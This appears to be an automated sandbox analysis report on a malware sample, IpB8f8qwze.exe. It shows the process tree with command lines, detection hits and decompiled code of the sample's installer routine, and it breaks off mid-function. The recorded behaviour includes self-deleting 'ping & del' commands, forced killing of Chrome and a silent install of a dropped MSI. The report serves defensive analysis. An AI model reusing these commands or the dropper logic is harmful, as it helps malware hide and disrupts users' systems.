                                                                                                                                                                Data Ascii: ng please contact the Trust &amp; Safety team for more information.</p> </div> </div> </div>... /.section --> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:t
                                                                                                                                                                Mar 7, 2021 19:21:38.272289038 CET1430INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Code Manipulations

                                                                                                                                                                Statistics

                                                                                                                                                                CPU Usage

                                                                                                                                                                Click to jump to process

                                                                                                                                                                Memory Usage

                                                                                                                                                                Click to jump to process

                                                                                                                                                                High Level Behavior Distribution

                                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                                Behavior

                                                                                                                                                                Click to jump to process

                                                                                                                                                                System Behavior

                                                                                                                                                                Analysis Process: IpB8f8qwze.exe PID: 6500 Parent PID: 5832

                                                                                                                                                                General

                                                                                                                                                                Start time:19:21:03
                                                                                                                                                                Start date:07/03/2021
                                                                                                                                                                Path:C:\Users\user\Desktop\IpB8f8qwze.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:'C:\Users\user\Desktop\IpB8f8qwze.exe'
                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                File size:4882440 bytes
                                                                                                                                                                MD5 hash:1B59FC1A89C1BC88EA4E1B26DA579120
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Yara matches:
                                                                                                                                                                • Rule: Ping_Command_in_EXE, Description: Detects an suspicious ping command execution in an executable, Source: 00000000.00000002.258774447.00000000027B0000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                Reputation:low

                                                                                                                                                                Chronological Activities

                                                                                                                                                                Analysis Process: msiexec.exe PID: 6560 Parent PID: 6500

                                                                                                                                                                General

                                                                                                                                                                Start time:19:21:07
                                                                                                                                                                Start date:07/03/2021
                                                                                                                                                                Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi'
                                                                                                                                                                Imagebase:0x140000
                                                                                                                                                                File size:59904 bytes
                                                                                                                                                                MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high

                                                                                                                                                                Chronological Activities

                                                                                                                                                                Analysis Process: 83C12B0D0FA88B10.exe PID: 6636 Parent PID: 6500

                                                                                                                                                                General

                                                                                                                                                                Start time:19:21:09
                                                                                                                                                                Start date:07/03/2021
                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe 0011 user01
                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                File size:4882440 bytes
                                                                                                                                                                MD5 hash:1B59FC1A89C1BC88EA4E1B26DA579120
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Yara matches:
                                                                                                                                                                • Rule: Ping_Command_in_EXE, Description: Detects an suspicious ping command execution in an executable, Source: 00000002.00000002.310468368.0000000002720000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                Antivirus matches:
                                                                                                                                                                • Detection: 19%, Metadefender, Browse
                                                                                                                                                                • Detection: 38%, ReversingLabs
                                                                                                                                                                Reputation:low

                                                                                                                                                                Chronological Activities

                                                                                                                                                                Analysis Process: msiexec.exe PID: 6652 Parent PID: 2072

                                                                                                                                                                General

                                                                                                                                                                Start time:19:21:08
                                                                                                                                                                Start date:07/03/2021
                                                                                                                                                                Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 0E9F5C63C593DB0A234ED10779F63A5A C
                                                                                                                                                                Imagebase:0x140000
                                                                                                                                                                File size:59904 bytes
                                                                                                                                                                MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high

                                                                                                                                                                Chronological Activities

                                                                                                                                                                Analysis Process: 83C12B0D0FA88B10.exe PID: 6704 Parent PID: 6500

                                                                                                                                                                General

                                                                                                                                                                Start time:19:21:10
                                                                                                                                                                Start date:07/03/2021
                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe 200 user01
                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                File size:4882440 bytes
                                                                                                                                                                MD5 hash:1B59FC1A89C1BC88EA4E1B26DA579120
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Yara matches:
                                                                                                                                                                • Rule: Ping_Command_in_EXE, Description: Detects an suspicious ping command execution in an executable, Source: 00000004.00000002.275254387.0000000002650000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                Reputation:low

                                                                                                                                                                Chronological Activities

                                                                                                                                                                Analysis Process: cmd.exe PID: 6736 Parent PID: 6500

                                                                                                                                                                General

                                                                                                                                                                Start time:19:21:13
                                                                                                                                                                Start date:07/03/2021
                                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\IpB8f8qwze.exe'
                                                                                                                                                                Imagebase:0x150000
                                                                                                                                                                File size:232960 bytes
                                                                                                                                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high

                                                                                                                                                                Chronological Activities

                                                                                                                                                                Analysis Process: conhost.exe PID: 6744 Parent PID: 6736

                                                                                                                                                                General

                                                                                                                                                                Start time:19:21:13
                                                                                                                                                                Start date:07/03/2021
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7ecfc0000
                                                                                                                                                                File size:625664 bytes
                                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high

                                                                                                                                                                Chronological Activities

                                                                                                                                                                Analysis Process: PING.EXE PID: 6776 Parent PID: 6736

                                                                                                                                                                General

                                                                                                                                                                Start time:19:21:14
                                                                                                                                                                Start date:07/03/2021
                                                                                                                                                                Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:ping 127.0.0.1 -n 3
                                                                                                                                                                Imagebase:0x1130000
                                                                                                                                                                File size:18944 bytes
                                                                                                                                                                MD5 hash:70C24A306F768936563ABDADB9CA9108
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:moderate

                                                                                                                                                                Chronological Activities

                                                                                                                                                                Analysis Process: 1615173766196.exe PID: 6972 Parent PID: 6636

                                                                                                                                                                General

                                                                                                                                                                Start time:19:21:16
                                                                                                                                                                Start date:07/03/2021
                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\1615173766196.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:'C:\Users\user\AppData\Roaming\1615173766196.exe' /sjson 'C:\Users\user\AppData\Roaming\1615173766196.txt'
                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                File size:103632 bytes
                                                                                                                                                                MD5 hash:EF6F72358CB02551CAEBE720FBC55F95
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:moderate

                                                                                                                                                                Chronological Activities

                                                                                                                                                                Analysis Process: cmd.exe PID: 7012 Parent PID: 6704

                                                                                                                                                                General

                                                                                                                                                                Start time:19:21:17
                                                                                                                                                                Start date:07/03/2021
                                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                Imagebase:0x150000
                                                                                                                                                                File size:232960 bytes
                                                                                                                                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high

                                                                                                                                                                Chronological Activities

                                                                                                                                                                Analysis Process: conhost.exe PID: 7028 Parent PID: 7012

                                                                                                                                                                General

                                                                                                                                                                Start time:19:21:18
                                                                                                                                                                Start date:07/03/2021
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7ecfc0000
                                                                                                                                                                File size:625664 bytes
                                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high

                                                                                                                                                                Chronological Activities

                                                                                                                                                                Analysis Process: taskkill.exe PID: 4632 Parent PID: 7012

                                                                                                                                                                General

                                                                                                                                                                Start time:19:21:21
                                                                                                                                                                Start date:07/03/2021
                                                                                                                                                                Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:taskkill /f /im chrome.exe
                                                                                                                                                                Imagebase:0x13a0000
                                                                                                                                                                File size:74752 bytes
                                                                                                                                                                MD5 hash:15E2E0ACD891510C6268CB8899F2A1A1
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:moderate

                                                                                                                                                                Chronological Activities

                                                                                                                                                                Analysis Process: cmd.exe PID: 6136 Parent PID: 6704

                                                                                                                                                                General

                                                                                                                                                                Start time:19:21:21
                                                                                                                                                                Start date:07/03/2021
                                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe'
                                                                                                                                                                Imagebase:0x150000
                                                                                                                                                                File size:232960 bytes
                                                                                                                                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high

                                                                                                                                                                Chronological Activities

                                                                                                                                                                Analysis Process: conhost.exe PID: 1004 Parent PID: 6136

                                                                                                                                                                General

                                                                                                                                                                Start time:19:21:22
                                                                                                                                                                Start date:07/03/2021
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7ecfc0000
                                                                                                                                                                File size:625664 bytes
                                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high

                                                                                                                                                                Chronological Activities

                                                                                                                                                                Analysis Process: PING.EXE PID: 5456 Parent PID: 6136

                                                                                                                                                                General

                                                                                                                                                                Start time:19:21:22
                                                                                                                                                                Start date:07/03/2021
                                                                                                                                                                Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:ping 127.0.0.1 -n 3
                                                                                                                                                                Imagebase:0x1130000
                                                                                                                                                                File size:18944 bytes
                                                                                                                                                                MD5 hash:70C24A306F768936563ABDADB9CA9108
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:moderate

                                                                                                                                                                Chronological Activities

                                                                                                                                                                Analysis Process: ThunderFW.exe PID: 7156 Parent PID: 6636

                                                                                                                                                                General

                                                                                                                                                                Start time:19:21:31
                                                                                                                                                                Start date:07/03/2021
                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe'
                                                                                                                                                                Imagebase:0x1140000
                                                                                                                                                                File size:73160 bytes
                                                                                                                                                                MD5 hash:F0372FF8A6148498B19E04203DBB9E69
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Antivirus matches:
                                                                                                                                                                • Detection: 3%, Metadefender, Browse
                                                                                                                                                                • Detection: 2%, ReversingLabs

                                                                                                                                                                Chronological Activities

                                                                                                                                                                Analysis Process: cmd.exe PID: 4920 Parent PID: 6636

                                                                                                                                                                General

                                                                                                                                                                Start time:19:21:38
                                                                                                                                                                Start date:07/03/2021
                                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe'
                                                                                                                                                                Imagebase:0xbc0000
                                                                                                                                                                File size:232960 bytes
                                                                                                                                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                Chronological Activities

                                                                                                                                                                Analysis Process: conhost.exe PID: 5964 Parent PID: 4920

                                                                                                                                                                General

                                                                                                                                                                Start time:19:21:38
                                                                                                                                                                Start date:07/03/2021
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7ecfc0000
                                                                                                                                                                File size:625664 bytes
                                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                Chronological Activities

                                                                                                                                                                Analysis Process: PING.EXE PID: 204 Parent PID: 4920

                                                                                                                                                                General

                                                                                                                                                                Start time:19:21:39
                                                                                                                                                                Start date:07/03/2021
                                                                                                                                                                Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:ping 127.0.0.1 -n 3
                                                                                                                                                                Imagebase:0xa20000
                                                                                                                                                                File size:18944 bytes
                                                                                                                                                                MD5 hash:70C24A306F768936563ABDADB9CA9108
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                Chronological Activities

                                                                                                                                                                Disassembly

                                                                                                                                                                Code Analysis

                                                                                                                                                                Reset < >

                                                                                                                                                                  Analysis Process: IpB8f8qwze.exe PID: 6500 Parent PID: 5832 IpB8f8qwze.exeCOMMON

                                                                                                                                                                  Executed Functions

                                                                                                                                                                  Function 10020600, Relevance: 40.4, APIs: 10, Strings: 13, Instructions: 176COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 88%
                                                                                                                                                                  			E10020600(void* __ebx, void* __edi, void* __eflags) {
				int _v8;
				intOrPtr _v16;
				char _v44;
				char _v311;
				char _v312;
				char _v575;
				char _v576;
				long _v580;
				intOrPtr _v584;
				intOrPtr _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				intOrPtr _v600;
				intOrPtr _v604;
				intOrPtr _v608;
				intOrPtr _v612;
				intOrPtr _v616;
				intOrPtr _v620;
				intOrPtr _v624;
				intOrPtr _v628;
				void* __esi;
				void* _t46;
				int _t47;
				void* _t56;
				void* _t57;
				int _t62;
				intOrPtr _t73;
				int _t75;
				int _t77;
				void* _t101;
				intOrPtr _t104;
				void* _t108;
				void* _t109;
				void* _t111;
				intOrPtr _t114;
				void* _t115;
				intOrPtr _t116;
				intOrPtr _t118;
				intOrPtr _t120;
				void* _t125;

				_t125 = __eflags;
				_t100 = __edi;
				_t82 = __ebx;
				_push(0xffffffff);
				_push(E100233D5);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t104;
				_push(_t101);
				E1001FDA0();
				_v312 = 0;
				E1000CF80(__edi,  &_v311, 0, 0x103);
				GetModuleFileNameA(0,  &_v312, 0x104);
				E1001A660(__ebx, _t100, _t101, _t125,  &_v44); // executed
				_v8 = 0;
				_t46 = E10001A50( &_v312, E100011E0( &_v44));
				_t108 = _t104 - 0x264 + 0x18;
				_t126 = _t46;
				if(_t46 == 0) {
					_t47 = E1001A150("Global\\exist_sign__install_r3"); // executed
					_t109 = _t108 + 4;
					__eflags = _t47;
					if(_t47 == 0) {
						_v576 = 0;
						E1000CF80(_t100,  &_v575, 0, 0x103);
						GetTempPathA(0x104,  &_v576);
						E1000CDB3( &_v576,  &_v576, 0x104, E100011E0( &_v44));
						_t111 = _t109 + 0x18;
						CopyFileA( &_v312,  &_v576, 0); // executed
						_v580 = GetTickCount();
						while(1) {
							_t56 = E1001A1D0( &_v312); // executed
							_t102 = _t56;
							_t57 = E1001A1D0( &_v576); // executed
							_t111 = _t111 + 8;
							__eflags = _t56 - _t57;
							if(__eflags == 0) {
								break;
							}
							Sleep(0x3e8);
							__eflags = GetTickCount() - _v580 - 0x7530;
							if(__eflags <= 0) {
								continue;
							} else {
							}
							break;
						}
						E1001FE40(); // executed
						E10020020(_t82, _t100, _t102, __eflags, "install", "user01", "-0.1", "51.0", "exe"); // executed
						_t114 = _t111 + 0x14 - 0x1c;
						_t89 = _t114;
						_v588 = _t114;
						_v612 = E10001160(_t114, __eflags, "status=main_start");
						E100202C0(_t82, _t100, _t102, __eflags); // executed
						_t115 = _t114 + 0x1c;
						_t62 = PathFileExistsA("C:\\hijack"); // executed
						__eflags = _t62;
						if(__eflags != 0) {
							L15:
							_t116 = _t115 - 0x1c;
							_v592 = _t116;
							_v616 = E10001160(_t116, __eflags, "status=check_debug");
							E100202C0(_t82, _t100, _t102, __eflags); // executed
							_t118 = _t116 + 0x1c - 0x1c;
							_v596 = _t118;
							_v620 = E10001160(_t118, __eflags, "user01");
							E1001FF30(_t82, _t100, _t102, __eflags); // executed
							_t120 = _t118 + 0x1c - 0x1c;
							_v600 = _t120;
							_v624 = E10001160(_t120, __eflags, "user01");
							E1001FE50(_t82, _t100, _t102, __eflags); // executed
							_v604 = _t120 + 0x1c - 0x1c;
							_v628 = E10001160(_t120 + 0x1c - 0x1c, __eflags, "status=main_over");
							E100202C0(_t82, _t100, _t102, __eflags); // executed
						} else {
							E1001A100(); // executed
							_t75 = E1001A110(_t89); // executed
							__eflags = _t75;
							if(_t75 == 0) {
								L12:
							} else {
								__eflags = E10019D70();
								if(__eflags == 0) {
									_t77 = E1001FA90(_t82, _t100, _t102, __eflags, 0x3e8, 0); // executed
									_t115 = _t115 + 8;
									__eflags = _t77;
									if(__eflags != 0) {
										goto L15;
									} else {
									}
								} else {
									goto L12;
								}
							}
						}
					} else {
					}
					E1001A2C0(); // executed
					_v608 = 1;
					_v8 = 0xffffffff;
					E100011A0( &_v44);
					_t73 = _v608;
				} else {
					E10020BC0(__ebx, _t100, _t101, _t126, "51.0");
					_v584 = 1;
					_v8 = 0xffffffff;
					E100011A0( &_v44);
					_t73 = _v584;
				}
				 *[fs:0x0] = _v16;
				return _t73;
			}











































                                                                                                                                                                  0x10020600
                                                                                                                                                                  0x10020600
                                                                                                                                                                  0x10020600
                                                                                                                                                                  0x10020603
                                                                                                                                                                  0x10020605
                                                                                                                                                                  0x10020610
                                                                                                                                                                  0x10020611
                                                                                                                                                                  0x1002061e
                                                                                                                                                                  0x1002061f
                                                                                                                                                                  0x10020624
                                                                                                                                                                  0x10020639
                                                                                                                                                                  0x1002064f
                                                                                                                                                                  0x10020659
                                                                                                                                                                  0x10020661
                                                                                                                                                                  0x10020678
                                                                                                                                                                  0x1002067d
                                                                                                                                                                  0x10020680
                                                                                                                                                                  0x10020682
                                                                                                                                                                  0x100206bf
                                                                                                                                                                  0x100206c4
                                                                                                                                                                  0x100206c7
                                                                                                                                                                  0x100206c9
                                                                                                                                                                  0x100206d0
                                                                                                                                                                  0x100206e5
                                                                                                                                                                  0x100206f9
                                                                                                                                                                  0x10020714
                                                                                                                                                                  0x10020719
                                                                                                                                                                  0x1002072c
                                                                                                                                                                  0x10020738
                                                                                                                                                                  0x1002073e
                                                                                                                                                                  0x10020745
                                                                                                                                                                  0x1002074d
                                                                                                                                                                  0x10020756
                                                                                                                                                                  0x1002075b
                                                                                                                                                                  0x1002075e
                                                                                                                                                                  0x10020760
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x10020767
                                                                                                                                                                  0x10020779
                                                                                                                                                                  0x1002077e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x10020780
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1002077e
                                                                                                                                                                  0x10020784
                                                                                                                                                                  0x100207a2
                                                                                                                                                                  0x100207aa
                                                                                                                                                                  0x100207ad
                                                                                                                                                                  0x100207af
                                                                                                                                                                  0x100207bf
                                                                                                                                                                  0x100207c5
                                                                                                                                                                  0x100207ca
                                                                                                                                                                  0x100207d2
                                                                                                                                                                  0x100207d8
                                                                                                                                                                  0x100207da
                                                                                                                                                                  0x10020810
                                                                                                                                                                  0x10020810
                                                                                                                                                                  0x10020815
                                                                                                                                                                  0x10020825
                                                                                                                                                                  0x1002082b
                                                                                                                                                                  0x10020833
                                                                                                                                                                  0x10020838
                                                                                                                                                                  0x10020848
                                                                                                                                                                  0x1002084e
                                                                                                                                                                  0x10020856
                                                                                                                                                                  0x1002085b
                                                                                                                                                                  0x1002086b
                                                                                                                                                                  0x10020871
                                                                                                                                                                  0x1002087e
                                                                                                                                                                  0x1002088e
                                                                                                                                                                  0x10020894
                                                                                                                                                                  0x100207dc
                                                                                                                                                                  0x100207dc
                                                                                                                                                                  0x100207e1
                                                                                                                                                                  0x100207e6
                                                                                                                                                                  0x100207e8
                                                                                                                                                                  0x100207f3
                                                                                                                                                                  0x100207ea
                                                                                                                                                                  0x100207ef
                                                                                                                                                                  0x100207f1
                                                                                                                                                                  0x100207ff
                                                                                                                                                                  0x10020804
                                                                                                                                                                  0x10020807
                                                                                                                                                                  0x10020809
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1002080b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x100207f1
                                                                                                                                                                  0x100207e8
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x100206cb
                                                                                                                                                                  0x1002089c
                                                                                                                                                                  0x100208a1
                                                                                                                                                                  0x100208ab
                                                                                                                                                                  0x100208b5
                                                                                                                                                                  0x100208ba
                                                                                                                                                                  0x10020684
                                                                                                                                                                  0x10020689
                                                                                                                                                                  0x10020691
                                                                                                                                                                  0x1002069b
                                                                                                                                                                  0x100206a5
                                                                                                                                                                  0x100206aa
                                                                                                                                                                  0x100206aa
                                                                                                                                                                  0x100208c3
                                                                                                                                                                  0x100208ce

                                                                                                                                                                  APIs
                                                                                                                                                                  • _memset.LIBCMT ref: 10020639
                                                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1002064F
                                                                                                                                                                    • Part of subcall function 1001A660: _memset.LIBCMT ref: 1001A6B1
                                                                                                                                                                    • Part of subcall function 1001A660: GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1001A6C7
                                                                                                                                                                    • Part of subcall function 1001A660: _sprintf.LIBCMT ref: 1001A705
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileModuleName_memset$_sprintf
                                                                                                                                                                  • String ID: -0.1$51.0$51.0$C:\hijack$Global\exist_sign__install_r3$exe$install$status=check_debug$status=main_over$status=main_start$user01$user01$user01
                                                                                                                                                                  • API String ID: 3079340674-877224509
                                                                                                                                                                  • Opcode ID: 77969cf0e0067dbf4ab6fa18ef71977aa024843d5ddcc2f32c7ae2d892fc3bab
                                                                                                                                                                  • Instruction ID: 4ca8eb26ed237a7cbfddb670d92fde38fcb821bcdd61c2f7abf1832b517c0666
                                                                                                                                                                  • Opcode Fuzzy Hash: 77969cf0e0067dbf4ab6fa18ef71977aa024843d5ddcc2f32c7ae2d892fc3bab
                                                                                                                                                                  • Instruction Fuzzy Hash: 7E51C2B9D003089BEB10FBA4DC4ABDD7675EB10344F4401A5FA0966183EF71BB84CBA2
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 1001F780, Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 177encryptionCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 52%
                                                                                                                                                                  			E1001F780(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
				int _v8;
				int _v12;
				char* _v16;
				BYTE* _v20;
				int _v24;
				int _v28;
				int _v32;
				int _v36;
				char _v299;
				char _v300;
				char _v563;
				char _v564;
				signed int _v568;
				void* __ebp;
				BYTE* _t66;
				int _t69;
				int _t70;
				int _t71;
				long _t72;
				int _t75;
				signed int _t90;
				void* _t120;
				void* _t121;
				void* _t122;
				void* _t123;
				void* _t124;
				void* _t127;

				_t119 = __esi;
				_t118 = __edi;
				_t91 = __ebx;
